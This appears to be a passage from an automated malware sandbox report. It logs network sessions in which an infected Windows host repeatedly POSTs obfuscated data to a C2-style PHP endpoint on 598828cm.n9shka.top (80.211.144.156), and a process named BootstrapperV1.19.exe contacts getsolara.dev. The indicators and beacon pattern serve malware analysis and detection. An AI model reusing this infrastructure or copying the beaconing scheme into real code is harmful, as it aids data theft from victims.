Sep 14, 2024 12:54:35.290688038 CEST	1724	OUT	Data Raw: 56 57 59 5c 54 41 5a 59 5e 5e 56 51 56 5d 54 58 57 54 5c 58 57 5a 55 5c 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VWY\TAZY^^VQV]TXWT\XWZU\QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%Y(<X&>U!8*[=5X'^$X%(?V2&#.<&F/%Z-1
Sep 14, 2024 12:54:35.601670027 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:35.728421926 CEST	308	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 00 1f 20 04 2a 42 20 5f 23 04 30 55 2a 2f 0c 5a 2a 1c 39 04 29 3c 05 5a 2a 1a 1b 5d 2a 03 0e 08 24 12 30 5c 27 1f 21 58 27 37 27 56 21 3b 2e 5a 0c 1d 20 01 21 23 00 10 32 06 2e 5f 33 57 2e 1a 37 32 28 07 31 38 2e 03 36 2f 22 10 3f 5e 3e 08 3d 32 31 52 28 2d 2e 08 2f 2d 36 53 34 02 23 51 00 10 26 53 26 10 3d 1e 22 37 3d 1c 3d 0f 29 5d 31 1c 31 0d 24 15 3d 01 32 38 00 00 24 20 20 02 20 22 23 5b 27 02 09 59 23 23 29 52 28 3e 23 52 2b 0d 28 57 02 3e 5c 4d Data Ascii: B _#0U/Z9)<Z]*$0\'!X'7'V!;.Z !#2._3W.72(18.6/"?^>=21R(-./-6S4#Q&S&="7==)]11$=28$ "#['Y##)R(>#R+(W>\M

Session ID	Source IP	Source Port	Destination IP	Destination Port
96	192.168.2.4	62863	80.211.144.156	80

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:35.082549095 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:54:35.431312084 CEST	1012	OUT	Data Raw: 56 56 5c 5b 54 43 5a 5a 5e 5e 56 51 56 52 54 59 57 55 5c 5a 57 5b 55 58 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VV\[TCZZ^^VQVRTYWU\ZW[UXQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&+<53-&R"Q$X*[."$#&'()+&:7U!X.<&F/%Z-
Sep 14, 2024 12:54:35.764415979 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:36.170259953 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP
Sep 14, 2024 12:54:36.171205044 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port
97	192.168.2.4	62864	80.211.144.156	80

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:36.301388979 CEST	266	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1008 Expect: 100-continue
Sep 14, 2024 12:54:36.650084972 CEST	1008	OUT	Data Raw: 56 57 59 55 51 45 5f 59 5e 5e 56 51 56 5b 54 52 57 57 5c 59 57 5e 55 58 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VWYUQE_Y^^VQV[TRWW\YW^UXQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&+Z&0.T#'0]>="?<[$88^23(*7&-X 3&8&F/%Z-
Sep 14, 2024 12:54:36.966149092 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:37.161189079 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:36 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port
98	192.168.2.4	62865	80.211.144.156	80

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:37.303347111 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:54:37.650106907 CEST	1012	OUT	Data Raw: 56 55 5c 5f 51 41 5a 5f 5e 5e 56 51 56 5d 54 52 57 55 5c 54 57 51 55 58 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VU\_QAZ_^^VQV]TRWU\TWQUXQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&?<=['.U!\=&!Y X'+&94+?1 :/&F/%Z-1
Sep 14, 2024 12:54:37.989903927 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:38.124530077 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:37 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port
99	192.168.2.4	62866	80.211.144.156	80

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:38.276174068 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1008 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:54:38.634526968 CEST	1008	OUT	Data Raw: 56 54 59 5c 54 43 5a 59 5e 5e 56 51 56 5b 54 5a 57 50 5c 5b 57 5e 55 5e 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VTY\TCZY^^VQV[TZWP\[W^U^QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%Z<9$5Q >>>[6/;%('&7?7P1>#/&F/%Z--
Sep 14, 2024 12:54:38.939486980 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:39.068399906 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:38 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port
100	192.168.2.4	62867	80.211.144.156	80

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:39.208765030 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:54:39.556346893 CEST	1012	OUT	Data Raw: 56 53 59 58 51 46 5f 5f 5e 5e 56 51 56 5f 54 53 57 5e 5c 5e 57 5d 55 5c 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VSYXQF__^^VQV_TSW^\^W]U\QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%<6$:"$+*>2"Y'%;8Y2:<?)V1\=X#/,&F/%Z-9
Sep 14, 2024 12:54:39.981513023 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:40.028269053 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:39 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port
101	192.168.2.4	62868	80.211.144.156	80

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:40.153672934 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1008 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:54:40.509540081 CEST	1008	OUT	Data Raw: 56 5e 5c 5f 54 47 5a 5d 5e 5e 56 51 56 5b 54 5d 57 51 5c 5a 57 5d 55 58 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: V^\_TGZ]^^VQV[T]WQ\ZW]UXQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%?!Y&.:!4;)=1!?Y%88^'93^?)S25] 0"/&F/%Z-1

Session ID	Source IP	Source Port	Destination IP	Destination Port
102	192.168.2.4	62869	80.211.144.156	80

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:40.750325918 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1748 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:54:41.103218079 CEST	1748	OUT	Data Raw: 56 56 59 5b 54 40 5f 5f 5e 5e 56 51 56 58 54 5e 57 53 5c 5f 57 5a 55 57 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VVY[T@__^^VQVXT^WS\_WZUWQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%X(<*3>6'(]=-&6/'+29?X?)<2)9_7=],&F/%Z-%
Sep 14, 2024 12:54:41.416115999 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:41.544501066 CEST	308	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:40 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 00 1f 23 15 2a 1a 0a 10 23 29 20 53 2b 2f 04 11 29 1c 3a 58 2b 3c 01 16 29 24 1b 5b 2a 3d 2b 18 24 02 33 06 30 1f 22 07 30 24 3f 1a 21 3b 2e 5a 0c 1d 23 59 23 0a 2a 1e 26 38 32 1c 27 0f 25 00 37 21 23 59 32 02 3d 5d 23 3f 00 5a 3c 3b 21 53 3e 31 07 10 28 3d 3e 43 3b 2e 29 08 23 02 23 51 00 10 26 51 26 3d 2a 02 35 34 22 0b 3d 21 25 59 25 25 32 54 27 02 2d 04 25 3b 29 5f 24 33 01 11 21 31 33 1f 27 02 34 05 20 23 0b 15 28 14 23 52 2b 0d 28 57 02 3e 5c 4d Data Ascii: ##) S+/):X+<)$[=+$30"0$?!;.Z#Y#&82'%7!#Y2=]#?Z<;!S>1(=>C;.)##Q&Q&=54"=!%Y%%2T'-%;)_$3!13'4 #(#R+(W>\M

Session ID	Source IP	Source Port	Destination IP	Destination Port
103	192.168.2.4	62870	80.211.144.156	80

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:40.891339064 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:54:41.243894100 CEST	1012	OUT	Data Raw: 56 5e 5c 58 54 44 5a 59 5e 5e 56 51 56 5e 54 5c 57 50 5c 5d 57 5b 55 56 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: V^\XTDZY^^VQV^T\WP\]W[UVQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%\<>'>!"Q ]=2#?%87&) +*02)&#0%;&F/%Z-=
Sep 14, 2024 12:54:41.555797100 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:41.688481092 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port
104	192.168.2.4	62871	80.211.144.156	80

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:41.808880091 CEST	266	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue
Sep 14, 2024 12:54:42.165795088 CEST	1012	OUT	Data Raw: 56 57 5c 5f 54 49 5f 5f 5e 5e 56 51 56 5c 54 5f 57 5f 5c 54 57 58 55 5b 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VW\_TI__^^VQV\T_W_\TWXU[QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%]+%'.>V54+=-#?' ')++9'P1\9Y4=[,,&F/%Z-
Sep 14, 2024 12:54:42.482866049 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:42.618242025 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port
105	192.168.2.4	62872	80.211.144.156	80

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:42.752290964 CEST	266	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue
Sep 14, 2024 12:54:43.103296041 CEST	1012	OUT	Data Raw: 53 55 59 5a 54 49 5a 53 5e 5e 56 51 56 59 54 58 57 5e 5c 5f 57 59 55 58 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: SUYZTIZS^^VQVYTXW^\_WYUXQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%+<&0=:S!7.Z!%(717X? 2*.4)Y8&F/%Z-!
Sep 14, 2024 12:54:43.444454908 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:43.578006029 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:42 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port
106	192.168.2.4	62873	80.211.144.156	80

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:43.718357086 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:54:44.391542912 CEST	25	IN	HTTP/1.1 100 Continue

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	172.67.203.125	443	7152	C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-14 10:52:05 UTC	63	OUT	GET / HTTP/1.1 Host: getsolara.dev Connection: Keep-Alive
2024-09-14 10:52:05 UTC	585	IN	HTTP/1.1 200 OK Date: Sat, 14 Sep 2024 10:52:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cCJqHvvFuVEIAwY6O7S%2BIn8FJK6nWWaxczdzmAhSJNUCIfLUv3f9mxipL%2FQV0mIqjIclveMgbR4Z09PV9rKn%2Bq2PknxSay2cpM%2B1ICX%2B9uGZ1UmKQ%2BMHQBZzKLpCrfvg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=0 Server: cloudflare CF-RAY: 8c2fd3542a7e1760-EWR
2024-09-14 10:52:05 UTC	784	IN	Data Raw: 31 31 32 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 112a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-14 10:52:05 UTC	1369	IN	Data Raw: 6c 65 73 2d 69 65 2d 63 73 73 27 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 Data Ascii: les-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookie
2024-09-14 10:52:05 UTC	1369	IN	Data Raw: 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 71 5a 71 6e 47 7a 49 7a 4f 58 54 78 56 50 6f 33 63 7a 4f 47 37 5f 6c 32 69 30 43 35 7a 45 32 72 59 7a 68 73 77 77 34 36 6a 73 59 2d 31 37 32 36 33 31 31 31 32 35 2d 30 2e 30 2e 31 2e 31 2d 2f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 Data Ascii: d="GET" enctype="text/plain"> <input type="hidden" name="atok" value="qZqnGzIzOXTxVPo3czOG7_l2i0C5zE2rYzhsww46jsY-1726311125-0.0.1.1-/"> <a href="https://www.cloudflare.com/learning/access-management/phis
2024-09-14 10:52:05 UTC	880	IN	Data Raw: 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b Data Ascii: an class="cf-footer-separator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link
2024-09-14 10:52:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	172.67.203.125	443	7152	C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-14 10:52:05 UTC	151	OUT	GET /asset/discord.json HTTP/1.1 Cookie: __cf_mw_byp=qZqnGzIzOXTxVPo3czOG7_l2i0C5zE2rYzhsww46jsY-1726311125-0.0.1.1-/; path=/ Host: getsolara.dev
